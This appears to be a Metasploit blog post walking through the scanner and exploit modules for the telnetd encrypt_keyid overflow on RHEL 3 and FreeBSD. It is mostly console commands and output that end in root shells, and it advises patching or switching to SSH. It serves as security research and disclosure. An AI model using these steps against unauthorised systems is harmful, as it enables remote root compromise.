In my last post, I discussed the recent BSD telnetd vulnerability and demonstrated the scanner module added to the Metasploit Framework. Since then, two new exploit modules have been released; one for FreeBSD versions 5.3 - 8.2 and another for Red Hat Enterprise Linux 3.

Starting with an updated copy of the Metasploit Framework, load the console and kick off the scanner:

$ msfconsole

msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow

msf auxiliary(telnet_encrypt_overflow) > set RHOSTS

msf auxiliary(telnet_encrypt_overflow) > set THREADS 64

msf auxiliary(telnet_encrypt_overflow) > run

[ ] VULNERABLE: localhost.localdomain (Linux release 2.4.21-4.EL #1 ...

[ ] VULNERABLE: FreeBSD/i386 (freebsd.localdomain) (pts/0)\x0d\x0a\x0d\x0alogin:

[*] Auxiliary module execution completed

For the first target (Linux), we will choose the RHEL 3 exploit:

msf> use exploit/linux/telnet/telnet_encrypt_keyid

msf exploit(telnet_encrypt_keyid) > set RHOST

msf exploit(telnet_encrypt_keyid) > exploit

[*] Started bind handler

[*] Brute forcing with 1 possible targets

[*] Trying target Red Hat Enterprise Linux 3 (krb5-telnet)...

[*] Sending first payload

[*] Sending second payload...

[*] Sending stage (36 bytes) to

[*] Command shell session 1 opened


uid=0(root) gid=0(root)


Abort session 1? [y/N] y

[*] Command shell session 1 closed.  Reason: User exit

Easy enough, now on to our FreeBSD target:

msf> use exploit/freebsd/telnet/telnet_encrypt_keyid

msf exploit(telnet_encrypt_keyid) > set RHOST

msf exploit(telnet_encrypt_keyid) > exploit

[*] Started reverse handler on

[*] Brute forcing with 9 possible targets

[*] Trying target FreeBSD 8.2...

[*] Sending first payload

[*] Sending second payload...

[*] Command shell session 2 opened


uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

That about sums it up. If for some crazy reason you are running telnet on your BSD systems or have the bad luck to be using a BSD-derived telnet daemon on linux (such as krb5-telnet), patch or upgrade to SSH as soon as possible. If you would like to contribute a new exploit target for either Linux or Windows, all we typically need is the output of the following command:

$ msfelfscan -j edx /path/to/telnetd (msfelfscan is part of the Metasploit Framework)

The exploit is ridiculously simple and only a single jmp target is needed to add reliable targeting for a new platform. Supporting BSD variants such as Dragonfly, NetBSD, and so is likely to require no more effort than a new jmp target (assuming no major compiler changes).

Dan Rosenberg confirmed that BSD-derived telnet CLIENTS are vulnerable as well, but we have not added any exploits for the client side at this time. Thanks again to Brandon Perry for getting the ball rolling on the exploit code and testing against multiple targets.